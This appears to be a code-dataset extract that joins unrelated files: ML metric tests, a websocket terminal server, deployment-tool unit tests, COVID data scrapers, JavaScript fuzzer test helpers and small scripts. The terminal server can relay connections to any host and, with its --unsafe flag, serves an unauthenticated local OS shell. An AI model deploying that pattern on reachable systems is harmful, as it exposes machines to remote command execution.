assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 3.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([0, 0]),
np.array([1, 2])) == pytest.approx(0.0, EPS)
def test_precision_macro_multi():
obj = PrecisionMacro()
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 9.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([0, 0]),
np.array([1, 2])) == pytest.approx(0.0, EPS)
def test_precision_weighted_multi():
obj = PrecisionWeighted()
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 9.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([0, 0]),
np.array([1, 2])) == pytest.approx(0.0, EPS)
def test_recall_binary():
obj = Recall()
assert obj.score(np.array([0, 0, 0, 1, 1, 1]),
np.array([1, 1, 1, 1, 1, 1])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1]),
np.array([0, 0, 0, 0, 0, 0])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([1, 1, 1, 1, 1, 1]),
np.array([0, 0, 0, 1, 1, 1])) == pytest.approx(0.5, EPS)
def test_recall_micro_multi():
obj = RecallMicro()
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 3.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([0, 0]),
np.array([1, 2])) == pytest.approx(0.0, EPS)
def test_recall_macro_multi():
obj = RecallMacro()
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 3.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([0, 0]),
np.array([1, 2])) == pytest.approx(0.0, EPS)
def test_recall_weighted_multi():
obj = RecallWeighted()
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])) == pytest.approx(1 / 3.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])) == pytest.approx(1.0, EPS)
assert obj.score(np.array([0, 0, 0, 1, 1, 1, 2, 2, 2]),
np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])) == pytest.approx(0.0, EPS)
assert obj.score(np.array([0, 0]),
np.array([1, 2])) == pytest.approx(0.0, EPS)
def test_log_linear_model():
obj = MeanSquaredLogError()
root_obj = RootMeanSquaredLogError()
s1_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])
s1_actual = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])
s2_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])
s2_actual = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])
s3_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])
s3_actual = np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])
assert obj.score(s1_predicted, s1_actual) == pytest.approx(0.562467324910)
assert obj.score(s2_predicted, s2_actual) == pytest.approx(0)
assert obj.score(s3_predicted, s3_actual) == pytest.approx(0.617267976207983)
assert root_obj.score(s1_predicted, s1_actual) == pytest.approx(np.sqrt(0.562467324910))
assert root_obj.score(s2_predicted, s2_actual) == pytest.approx(0)
assert root_obj.score(s3_predicted, s3_actual) == pytest.approx(np.sqrt(0.617267976207983))
def test_mse_linear_model():
obj = MSE()
root_obj = RootMeanSquaredError()
s1_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])
s1_actual = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0])
s2_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])
s2_actual = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])
s3_predicted = np.array([0, 0, 0, 1, 1, 1, 2, 2, 2])
s3_actual = np.array([2, 2, 2, 0, 0, 0, 1, 1, 1])
assert obj.score(s1_predicted, s1_actual) == pytest.approx(5. / 3.)
assert obj.score(s2_predicted, s2_actual) == pytest.approx(0)
assert obj.score(s3_predicted, s3_actual) == pytest.approx(2.)
assert root_obj.score(s1_predicted, s1_actual) == pytest.approx(np.sqrt(5. / 3.))
assert root_obj.score(s2_predicted, s2_actual) == pytest.approx(0)
assert root_obj.score(s3_predicted, s3_actual) == pytest.approx(np.sqrt(2.))
def test_mcc_catches_warnings():
y_true = [1, 0, 1, 1]
y_predicted = [0, 0, 0, 0]
with pytest.warns(RuntimeWarning) as record:
sk_matthews_corrcoef(y_true, y_predicted)
assert "invalid value" in str(record[-1].message)
with pytest.warns(None) as record:
MCCBinary().objective_function(y_true, y_predicted)
MCCMulticlass().objective_function(y_true, y_predicted)
assert len(record) == 0
def test_mape_time_series_model():
obj = MAPE()
s1_actual = np.array([0, 0, 1, 1, 1, 1, 2, 0, 2])
s1_predicted = np.array([0, 1, 0, 1, 1, 2, 1, 2, 0])
s2_actual = np.array([-1, -2, 1, 3])
s2_predicted = np.array([1, 2, -1, -3])
s3_actual = np.array([1, 2, 4, 2, 1, 2])
s3_predicted = np.array([0, 2, 2, 1, 3, 2])
with pytest.raises(ValueError, match="Mean Absolute Percentage Error cannot be used when targets contain the value 0."):
obj.score(s1_actual, s1_predicted)
assert obj.score(s2_actual, s2_predicted) == pytest.approx(8 / 4 * 100)
assert obj.score(s3_actual, s3_predicted) == pytest.approx(4 / 6 * 100)
assert obj.score(pd.Series(s3_actual, index=range(-12, -6)), s3_predicted) == pytest.approx(4 / 6 * 100)
assert obj.score(pd.Series(s2_actual, index=range(10, 14)),
pd.Series(s2_predicted, index=range(20, 24))) == pytest.approx(8 / 4 * 100)
@pytest.mark.parametrize("objective_class", _all_objectives_dict().values())
def test_calculate_percent_difference(objective_class):
score = 5
reference_score = 10
change = ((-1) ** (not objective_class.greater_is_better) * (score - reference_score)) / reference_score
answer = 100 * change
assert objective_class.calculate_percent_difference(score, reference_score) == answer
assert objective_class.perfect_score is not None
@pytest.mark.parametrize("objective_class,nan_value", product(_all_objectives_dict().values(), [None, np.nan]))
def test_calculate_percent_difference_with_nan(objective_class, nan_value):
assert pd.isna(objective_class.calculate_percent_difference(nan_value, 2))
assert pd.isna(objective_class.calculate_percent_difference(-1, nan_value))
assert pd.isna(objective_class.calculate_percent_difference(nan_value, nan_value))
assert pd.isna(objective_class.calculate_percent_difference(2, 0))
def test_calculate_percent_difference_negative_and_equal_numbers():
assert CostBenefitMatrix.calculate_percent_difference(score=5, baseline_score=5) == 0
assert CostBenefitMatrix.calculate_percent_difference(score=-5, baseline_score=-10) == 50
assert CostBenefitMatrix.calculate_percent_difference(score=-10, baseline_score=-5) == -100
assert CostBenefitMatrix.calculate_percent_difference(score=-5, baseline_score=10) == -150
assert CostBenefitMatrix.calculate_percent_difference(score=10, baseline_score=-5) == 300
# These values are not possible for LogLossBinary but we need them for 100% coverage
# We might add an objective where lower is better that can take negative values in the future
assert LogLossBinary.calculate_percent_difference(score=-5, baseline_score=-10) == -50
assert LogLossBinary.calculate_percent_difference(score=-10, baseline_score=-5) == 100
assert LogLossBinary.calculate_percent_difference(score=-5, baseline_score=10) == 150
assert LogLossBinary.calculate_percent_difference(score=10, baseline_score=-5) == -300
def test_calculate_percent_difference_small():
expected_value = 100 * -1 * np.abs(1e-9 / (1e-9))
assert np.isclose(ExpVariance.calculate_percent_difference(score=0, baseline_score=1e-9), expected_value, atol=1e-8)
assert pd.isna(ExpVariance.calculate_percent_difference(score=0, baseline_score=1e-10))
assert pd.isna(ExpVariance.calculate_percent_difference(score=1e-9, baseline_score=0))
assert pd.isna(ExpVariance.calculate_percent_difference(score=0, baseline_score=0))
| 2.28125 | 2 |
server-python3/server.py | Aaron-Ming/websocket_terminal | 40 | 7842 | <reponame>Aaron-Ming/websocket_terminal<filename>server-python3/server.py<gh_stars>10-100
import os
import urllib.parse
import eventlet
import eventlet.green.socket
# eventlet.monkey_patch()
import eventlet.websocket
import eventlet.wsgi
import wspty.pipe
from flask import Flask, request, redirect
from wspty.EchoTerminal import EchoTerminal
from wspty.EncodedTerminal import EncodedTerminal
from wspty.WebsocketBinding import WebsocketBinding
import config
def make_app():
app = Flask(__name__)
app.static_folder = get_static_folder()
print("Serving static files from: " + app.static_folder)
@app.route('/')
def index():
newurl = b'/static/index.html'
if request.query_string:
newurl = newurl + b'?' + request.query_string
return redirect(newurl)
return app
def parse_query(qstr):
return {k: v[0] for k, v in urllib.parse.parse_qs(qstr).items()}
def debug(s):
app.logger.debug(s)
class TerminalFactory:
def __init__(self, args_dict, allow_unsafe=False):
self.kind = args_dict['kind']
self.hostname = args_dict.get('hostname', 'localhost')
self.port = int(args_dict.get('port', '22'))
self.username = args_dict.get('username')
self.password = args_dict.get('password')
self.term = args_dict.get('term')
self.encoding = args_dict.get('encoding', 'utf8')
self.allow_unsafe = allow_unsafe
def create_binary(self):
if self.kind == 'ssh':
from wspty.SshTerminal import SshTerminal
return SshTerminal(
self.hostname, self.port, self.username, self.password, self.term
)
if self.kind == 'raw':
from wspty.SocketTerminal import SocketTerminal
sock = eventlet.green.socket.socket()
ip = eventlet.green.socket.gethostbyname(self.hostname)
sock.connect((ip, self.port))
return SocketTerminal(sock)
if self.kind == 'echo':
return EchoTerminal()
if self.kind == 'prompt':
if not self.allow_unsafe:
raise Exception("kind {} is disabled".format(self.kind))
from wspty import PromptTerminal
return PromptTerminal.os_terminal()
raise NotImplemented('kind: {}'.format(self.kind))
def create(self):
return EncodedTerminal(self.create_binary(), self.encoding)
class DefaultRootApp:
def __init__(self):
self._app_handle_wssh = eventlet.websocket.WebSocketWSGI(self.handle_wssh)
self.allow_unsafe = False
def handle_wssh(self, ws):
debug('Creating terminal with remote {remote}'.format(
remote=ws.environ.get('REMOTE_ADDR'),
))
ws_binding = WebsocketBinding(ws)
query = parse_query(ws.environ.get('QUERY_STRING', ''))
terminal = None
try:
kind, terminal = self.create_terminal(query)
ws_binding.send('Connected to %s\r\n' % (kind,))
wspty.pipe.pipe(ws_binding, terminal)
except BaseException as e:
ws_binding.send_error(e)
raise
finally:
if terminal:
terminal.close()
debug('Closing terminal normally with remote {remote}'.format(
remote=ws.environ.get('REMOTE_ADDR'),
))
return ''
def create_terminal(self, obj):
factory = TerminalFactory(obj, self.allow_unsafe)
return factory.kind, factory.create()
def handler(self, env, *args):
route = env["PATH_INFO"]
if route == '/wssh':
return self._app_handle_wssh(env, *args)
else:
return app(env, *args)
def make_parser():
import argparse
parser = argparse.ArgumentParser(description='Websocket Terminal server')
parser.add_argument('-l', '--listen', default='', help='Listen on interface (default all)')
parser.add_argument('-p', '--port', default=5002, type=int, help='Listen on port')
parser.add_argument('--unsafe', action='store_true', help='Allow unauthenticated connections to local machine')
return parser
def start(interface, port, root_app_handler):
conn = (interface, port)
listener = eventlet.listen(conn)
print('listening on {0}:{1}'.format(*conn))
try:
eventlet.wsgi.server(listener, root_app_handler)
except KeyboardInterrupt:
pass
def start_default(interface, port, allow_unsafe=False, root_app_cls=DefaultRootApp):
root_app = root_app_cls()
root_app.allow_unsafe = allow_unsafe
start(interface, port, root_app.handler)
def main():
args = make_parser().parse_args()
start_default(args.listen, args.port, args.unsafe)
def get_static_folder():
path_root = os.path.join(os.path.dirname(os.path.realpath(__file__)), '../client')
path_root = os.path.join(path_root, config.CLIENT_DIR)
return os.path.abspath(path_root)
app = make_app()
if __name__ == '__main__':
main()
| 2.4375 | 2 |
tests/unit/test_roger_promote.py | seomoz/roger-mesos-tools | 0 | 7843 | # -*- encoding: utf-8 -*-
"""
Unit test for roger_promote.py
"""
import tests.helper
import unittest
import os
import os.path
import pytest
import requests
from mockito import mock, Mock, when
from cli.roger_promote import RogerPromote
from cli.appconfig import AppConfig
from cli.settings import Settings
from cli.framework import Framework
from cli.frameworkUtils import FrameworkUtils
from cli.marathon import Marathon
from cli.chronos import Chronos
class TestRogerPromote(unittest.TestCase):
def setUp(self):
self.marathon = mock(Marathon)
self.settings = mock(Settings)
self.app_config = mock(AppConfig)
self.framework = self.marathon
self.framework_utils = mock(FrameworkUtils)
self.config_file = "test.yml"
self.roger_env = {}
os.environ['ROGER_CONFIG_DIR'] = '/vagrant/config'
@property
def config_dir(self):
return os.environ['ROGER_CONFIG_DIR']
def test_config_dir(self):
rp = RogerPromote()
assert rp.config_dir == '/vagrant/config'
def test_roger_env(self):
fake_config = tests.helper.fake_config()
settings = mock(Settings)
when(self.app_config).getRogerEnv(
self.config_dir
).thenReturn(fake_config)
rp = RogerPromote(app_config=self.app_config)
assert rp.roger_env == fake_config
def test_set_framework(self):
app_data = {'test_app': {'name': 'test_app'}}
when(self.app_config).getAppData(
self.config_dir, self.config_file, 'test_app'
).thenReturn(app_data)
rp = RogerPromote(app_config=self.app_config)
rp._set_framework(self.config_file, 'test_app')
assert rp._framework.getName() == 'Marathon'
def test_image_name(self):
os.environ['ROGER_USER'] = "first.last"
os.environ['ROGER_USER_PASS_DEV'] = "password"
os.environ['ROGER_USER_PASS_STAGE'] = "password"
os.environ['ROGER_USER_PASS_PROD'] = "password"
framework = mock(Marathon)
when(framework).getName().thenReturn("Marathon")
when(framework).get_app_id(
"test_path/test_app.json",
"Marathon"
).thenReturn("app_id")
when(framework).get_image_name(
'first.last',
"password",
"dev",
"app_id",
self.config_dir,
self.config_file
).thenReturn("test_image")
rp = RogerPromote(framework=framework)
assert rp._image_name(
'dev',
self.config_file,
"test_path/test_app.json") == 'test_image'
def test_config_resolver(self):
framework = mock(Framework)
settings = mock(Settings)
app_config = mock(AppConfig)
config_dir = '/vagrant/config'
fake_team_config = tests.helper.fake_team_config()
when(settings).getConfigDir().thenReturn(config_dir)
when(app_config).getConfig(
config_dir, 'roger.json'
).thenReturn(fake_team_config)
rp = RogerPromote(settings=settings, app_config=app_config)
val = rp._config_resolver('template_path', 'test_app', 'roger.json')
assert val == 'framework_template_path'
def test_roger_push_script(self):
path = RogerPromote()._roger_push_script()
assert 'roger-mesos-tools/cli/roger_push.py' in path
| 2.21875 | 2 |
data/collectors.py | papb/COVID-19 | 6 | 7844 | <filename>data/collectors.py
import json
import pandas as pd
import requests
def load_dump_covid_19_data():
COVID_19_BY_CITY_URL='https://raw.githubusercontent.com/wcota/covid19br/master/cases-brazil-cities-time.csv'
by_city=(pd.read_csv(COVID_19_BY_CITY_URL)
.query('country == "Brazil"')
.drop(columns=['country'])
.pipe(lambda df: df[df.state!='TOTAL'])
.assign(city=lambda df: df.city.apply(lambda x: x.split('/')[0]))
.rename(columns={'totalCases': 'cases',
'newCases': 'new_cases',
'state': 'uf'})
.sort_values(by=['city', 'date'])
)
by_uf = (by_city
.groupby(['date', 'uf'])
['new_cases', 'cases']
.sum()
.reset_index())
dfs = [by_uf, by_city]
filenames = ['by_uf', 'by_city']
for df, filename in zip(dfs, filenames):
output_path = f'data/csv/covid_19/{filename}/{filename}.csv'
df.to_csv(output_path, index=False)
print(f'{filename} data exported to {output_path}')
def load_dump_uf_pop():
IBGE_POPULATION_EXCEL_URL = 'ftp://ftp.ibge.gov.br/Estimativas_de_Populacao/Estimativas_2019/estimativa_dou_2019.xls'
def _load_uf_codes():
print('Scraping UF codes')
return (
pd.read_html(
'https://www.oobj.com.br/bc/article/'
'quais-os-c%C3%B3digos-de-cada-uf-no-brasil-465.html'
)
[0]
.replace('\s\(\*\)', '', regex=True)
.rename(columns={'UF': 'uf'})
[['Unidade da Federação', 'uf']]
)
def _load_uf_capitals():
print('Scraping UF capital names')
return (
pd.read_html(
'https://www.estadosecapitaisdobrasil.com/'
)
[0]
.rename(columns={'Sigla': 'uf', 'Capital': 'city'})
[['uf', 'city']]
)
# TODO: download excel file only once
def _download_ibge_excel_file(url):
pass
def _load_city_pop():
print('Scraping city population')
return (
pd.read_excel(IBGE_POPULATION_EXCEL_URL, sheet_name='Municípios', header=1)
.rename(columns={
'COD. UF': 'UF_code',
'COD. MUNIC': 'city_code',
'NOME DO MUNICÍPIO': 'city',
'POPULAÇÃO ESTIMADA': 'estimated_population'
})
.dropna(how='any')
.assign(estimated_population=lambda df: df.estimated_population
.replace('\.', '', regex=True)
.replace('\-', ' ', regex=True)
.replace('\(\d+\)', '', regex=True)
.astype('int')
)
.assign( UF_code=lambda df: df.UF_code.astype(int))
.assign(city_code=lambda df: df.city_code.astype(int))
.rename(columns={'UF': 'uf'})
[['uf', 'city', 'estimated_population']]
)
def _load_uf_pop():
print('Scraping UF population')
uf_codes = _load_uf_codes()
return (
pd.read_excel(IBGE_POPULATION_EXCEL_URL, header=1)
.drop(columns=['Unnamed: 1'])
.rename(columns={'POPULAÇÃO ESTIMADA': 'estimated_population'})
.dropna(how='any')
.assign(estimated_population=lambda df: df.estimated_population
.replace('\.', '', regex=True)
.replace('\-', ' ', regex=True)
.replace('\(\d\)', '', regex=True)
.astype('int')
)
.pipe(lambda df: pd.merge(df,
uf_codes,
left_on='BRASIL E UNIDADES DA FEDERAÇÃO',
right_on='Unidade da Federação',
how='inner'))
[['uf', 'estimated_population']]
)
uf_pop, city_pop, uf_capitals = (_load_uf_pop(),
_load_city_pop(),
_load_uf_capitals())
print('Combining uf and city data')
uf_pop = (
uf_pop
# Add capital city name
.merge(
uf_capitals,
how='left',
on='uf'
)
# Add capital population
.merge(
city_pop,
how='left',
on=['uf', 'city']
)
.rename(
columns={
'estimated_population_x': 'estimated_population',
'estimated_population_y': 'capital_estimated_population'
}
)
)
dfs = [uf_pop, city_pop]
filenames = ['by_uf', 'by_city']
for df, filename in zip(dfs, filenames):
output_path = f'data/csv/population/{filename}/{filename}.csv'
df.to_csv(output_path, index=False)
print(f'{filename} data exported to {output_path}')
def load_jh_df(csv):
'''
Loads a CSV file from JH repository and make some transforms
'''
jh_data_path = (
'https://raw.githubusercontent.com/'
'CSSEGISandData/COVID-19/master/'
'csse_covid_19_data/csse_covid_19_time_series/'
)
return (
pd.read_csv(
jh_data_path
+ csv[1]
)
.drop(['Lat', 'Long'], axis=1)
.groupby('Country/Region')
.sum()
.reset_index()
.rename(
columns={'Country/Region':'country'}
)
.melt(
id_vars=['country'],
var_name='date',
value_name=csv[0]
)
.assign(
date=lambda x: pd.to_datetime(
x['date'],
format='%m/%d/%y'
)
)
)
def load_jh_data():
'''
Loads the latest COVID-19 global data from
Johns Hopkins University repository
'''
cases_csv = ('cases', 'time_series_19-covid-Confirmed.csv')
deaths_csv = ('deaths', 'time_series_19-covid-Deaths.csv')
recovered_csv = ('recoveries', 'time_series_19-covid-Recovered.csv')
return (
pd.merge(
pd.merge(
load_jh_df(cases_csv),
load_jh_df(deaths_csv)
),
load_jh_df(recovered_csv)
)
.reindex(
columns = ['date',
'cases',
'deaths',
'recoveries',
'country']
)
)
if __name__ == '__main__':
try:
load_dump_covid_19_data()
except Exception as e:
print(f'Error when collecting COVID-19 cases data: {repr(e)}')
try:
load_dump_uf_pop()
except Exception as e:
print(f'Error when collecting population data: {repr(e)}')
| 3.109375 | 3 |
testsuite/testsuite_helpers.py | freingruber/JavaScript-Raider | 91 | 7845 | <gh_stars>10-100
import config as cfg
import utils
import native_code.executor as executor
number_performed_tests = 0
expectations_correct = 0
expectations_wrong = 0
def reset_stats():
global number_performed_tests, expectations_correct, expectations_wrong
number_performed_tests = 0
expectations_correct = 0
expectations_wrong = 0
def get_number_performed_tests():
global number_performed_tests
return number_performed_tests
def get_expectations_correct():
global expectations_correct
return expectations_correct
def get_expectations_wrong():
global expectations_wrong
return expectations_wrong
def assert_success(result):
global number_performed_tests
number_performed_tests += 1
if result.status != executor.Execution_Status.SUCCESS:
utils.msg("[-] ERROR: Returned status was not SUCCESS")
raise Exception()
def assert_crash(result):
global number_performed_tests
number_performed_tests += 1
if result.status != executor.Execution_Status.CRASH:
utils.msg("[-] ERROR: Returned status was not CRASH")
raise Exception()
def assert_exception(result):
global number_performed_tests
number_performed_tests += 1
if result.status != executor.Execution_Status.EXCEPTION_THROWN and result.status != executor.Execution_Status.EXCEPTION_CRASH:
utils.msg("[-] ERROR: Returned status was not EXCEPTION")
raise Exception()
def assert_timeout(result):
global number_performed_tests
number_performed_tests += 1
if result.status != executor.Execution_Status.TIMEOUT:
utils.msg("[-] ERROR: Returned status was not TIMEOUT")
raise Exception()
def assert_output_equals(result, expected_output):
global number_performed_tests
number_performed_tests += 1
if result.output.strip() != expected_output.strip():
utils.msg("[-] ERROR: Returned output (%s) was not correct (%s)" % (result.output.strip(), expected_output))
raise Exception()
def execute_program(code_to_execute):
cfg.exec_engine.restart_engine()
result = cfg.exec_engine.execute_safe(code_to_execute)
return result
def restart_exec_engine():
cfg.exec_engine.restart_engine()
def execute_program_from_restarted_engine(code_to_execute):
restart_exec_engine()
return execute_program(code_to_execute)
def assert_int_value_equals(value_real, value_expected, error_msg):
global number_performed_tests
number_performed_tests += 1
if value_real == value_expected:
return # Test PASSED
utils.msg("[-] ERROR: %s (expected: %d ,real: %d)" % (error_msg, value_expected, value_real))
# In this case I throw an exception to stop execution because speed optimized functions must always be correct
raise Exception() # Raising an exception shows the stacktrace which contains the line number where a check failed
def assert_string_value_equals(string_real, string_expected, error_msg):
global number_performed_tests
number_performed_tests += 1
if string_real == string_expected:
return # Test PASSED
print("[-] ERROR: %s (expected: %s ,real: %s)" % (error_msg, string_expected, string_real))
# In this case I throw an exception to stop execution because speed optimized functions must always be correct
raise Exception() # Raising an exception shows the stacktrace which contains the line number where a check failed
def assert_no_new_coverage(result):
global number_performed_tests
number_performed_tests += 1
if result.status != executor.Execution_Status.SUCCESS:
utils.msg("[-] ERROR: Returned status was not SUCCESS") # but the result must always be SUCCESS
raise Exception()
if result.num_new_edges == 0:
return # test PASSED
print("[-] ERROR: Found new coverage (%d) but expected that there is no new coverage!" % result.num_new_edges)
# In this case I throw an exception to stop execution because speed optimized functions must always be correct
raise Exception() # Raising an exception shows the stacktrace which contains the line number where a check failed
def assert_new_coverage(result):
global number_performed_tests
number_performed_tests += 1
if result.status != executor.Execution_Status.SUCCESS:
utils.msg("[-] ERROR: Returned status was not SUCCESS") # but the result must always be SUCCESS
raise Exception()
if result.num_new_edges != 0:
return # test PASSED
print("[-] ERROR: Found no new coverage but there should be one!")
# In this case I throw an exception to stop execution because speed optimized functions must always be correct
raise Exception() # Raising an exception shows the stacktrace which contains the line number where a check failed
# The expect functions don't throw an exception like the assert_* functions
# Instead, they just count how often the expected result was true
def expect_no_new_coverage(result):
global expectations_correct, expectations_wrong, number_performed_tests
number_performed_tests += 1
if result.status != executor.Execution_Status.SUCCESS:
utils.msg("[-] ERROR: Returned status was not SUCCESS") # but the result must always be SUCCESS
raise Exception()
if result.num_new_edges == 0:
expectations_correct += 1
else:
expectations_wrong += 1
# The expect functions don't throw an exception like the assert_* functions
# Instead, they just count how often the expected result was true
def expect_new_coverage(result):
global expectations_correct, expectations_wrong, number_performed_tests
number_performed_tests += 1
if result.status != executor.Execution_Status.SUCCESS:
utils.msg("[-] ERROR: Returned status was not SUCCESS") # but the result must always be SUCCESS
raise Exception()
if result.num_new_edges != 0:
expectations_correct += 1
else:
expectations_wrong += 1
| 2.40625 | 2 |
examples/my_configs/two.py | davidhyman/override | 0 | 7846 | <filename>examples/my_configs/two.py
from .one import *
fruit = 'banana'
colour = 'orange'
sam['eggs'] = 'plenty'
sam.pop('ham')
| 1.742188 | 2 |
students/K33402/Komarov_Georgy/LAB2/elevennote/src/api/urls.py | aglaya-pill/ITMO_ICT_WebDevelopment_2021-2022 | 0 | 7847 | <filename>students/K33402/Komarov_Georgy/LAB2/elevennote/src/api/urls.py
from django.urls import path, include
from rest_framework_jwt.views import obtain_jwt_token
from rest_framework.routers import DefaultRouter
from .views import NoteViewSet
app_name = 'api'
router = DefaultRouter(trailing_slash=False)
router.register('notes', NoteViewSet)
urlpatterns = [
path('jwt-auth/', obtain_jwt_token),
path('', include(router.urls)),
]
| 1.78125 | 2 |
PathPlanning/run.py | CandleStein/VAlg | 0 | 7848 | from planning_framework import path
import cv2 as cv
import numpy as np
import argparse
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser(description="Path Planning Visualisation")
parser.add_argument(
"-n",
"--n_heuristic",
default=2,
help="Heuristic for A* Algorithm (default = 2). 0 for Dijkstra's Algorithm",
)
args = parser.parse_args()
N_H = int(args.n_heuristic)
drawing = False # true if mouse is pressed
mode = "obs" # if True, draw rectangle. Press 'm' to toggle to curve
ix, iy = -1, -1
sx, sy = 0, 0
dx, dy = 50, 50
# mouse callback function
def draw(event, x, y, flags, param):
global mode, sx, sy, dx, dy, drawing
if event == cv.EVENT_LBUTTONDOWN:
drawing = True
elif event == cv.EVENT_MOUSEMOVE:
if drawing == True:
if mode == "obs":
cv.rectangle(img, (x - 5, y - 5), (x + 5, y + 5), (255, 255, 255), -1)
elif event == cv.EVENT_LBUTTONUP:
drawing = False
if mode == "obs":
cv.rectangle(img, (x - 5, y - 5), (x + 5, y + 5), (255, 255, 255), -1)
elif mode == "src":
cv.circle(img, (x, y), 5, (255, 0, 0), -1)
sx, sy = x, y
elif mode == "dst":
cv.circle(img, (x, y), 5, (0, 255, 0), -1)
dx, dy = x, y
img = np.zeros((512, 512, 3), np.uint8)
inv_im = np.ones(img.shape) * 255
cv.namedWindow("Draw the Occupancy Map")
cv.setMouseCallback("Draw the Occupancy Map", draw)
while 1:
cv.imshow("Draw the Occupancy Map", inv_im - img)
if cv.waitKey(20) & 0xFF == 27:
break
cv.destroyAllWindows()
mode = "src"
img_ = img
cv.namedWindow("Set the Starting Point")
cv.setMouseCallback("Set the Starting Point", draw)
while 1:
cv.imshow("Set the Starting Point", inv_im - img)
if cv.waitKey(20) & 0xFF == 27:
break
# cv.waitKey(20)
cv.destroyAllWindows()
mode = "dst"
end = "Set the End Point"
cv.namedWindow(end)
cv.setMouseCallback(end, draw)
while cv.getWindowProperty(end, 0) >= 0:
cv.imshow(end, inv_im - img)
if cv.waitKey(20) & 0xFF == 27:
break
cv.destroyAllWindows()
img = cv.resize(img_, (50, 50), interpolation=cv.INTER_AREA)
inv_img = np.ones(img.shape)
np.savetxt("map.txt", np.array(img[:, :, 0]))
plt.imshow(inv_img - img)
start = np.array([sx, sy]) * 50 // 512
end = np.array([dx, dy]) * 50 // 512
path(start, end, N_H)
| 2.984375 | 3 |
Codeforces/problems/0136/A/136A.py | object-oriented-human/competitive | 2 | 7849 | <gh_stars>1-10
n = int(input())
line = list(map(int, input().split()))
l = {}
res = ""
for i, j in enumerate(line):
l[j] = i+1
for k in range(n):
res += str(l[k+1]) + " "
print(res.rstrip()) | 2.875 | 3 |
generatey.py | YiLisa/DSCI560-hw2 | 0 | 7850 | <filename>generatey.py
import pandas as pd
def main():
input = pd.read_csv('random_x.csv', header=None)
x=input[0].tolist()
y = []
for n in x:
y.append(3*int(n)+6)
df = pd.DataFrame(y)
df.to_csv('output_y.csv', index=False, header=False)
if __name__ == '__main__':
main()
print('generating y = 3x+6...') | 3.453125 | 3 |
setup.py | burn874/mtg | 0 | 7851 | import re
from pkg_resources import parse_requirements
import pathlib
from setuptools import find_packages, setup
README_FILE = 'README.md'
REQUIREMENTS_FILE = 'requirements.txt'
VERSION_FILE = 'mtg/_version.py'
VERSION_REGEXP = r'^__version__ = \'(\d+\.\d+\.\d+)\''
r = re.search(VERSION_REGEXP, open(VERSION_FILE).read(), re.M)
if r is None:
raise RuntimeError(f'Unable to find version string in {VERSION_FILE}.')
version = r.group(1)
long_description = open(README_FILE, encoding='utf-8').read()
install_requires = [str(r) for r in parse_requirements(open(REQUIREMENTS_FILE, 'rt'))]
setup(
name='mtg',
version=version,
description='mtg is a collection of data science and ml projects for Magic:the Gathering',
long_description=long_description,
long_description_content_type='text/markdown',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/RyanSaxe/mtg',
packages=find_packages(),
install_requires=install_requires,
)
| 1.984375 | 2 |
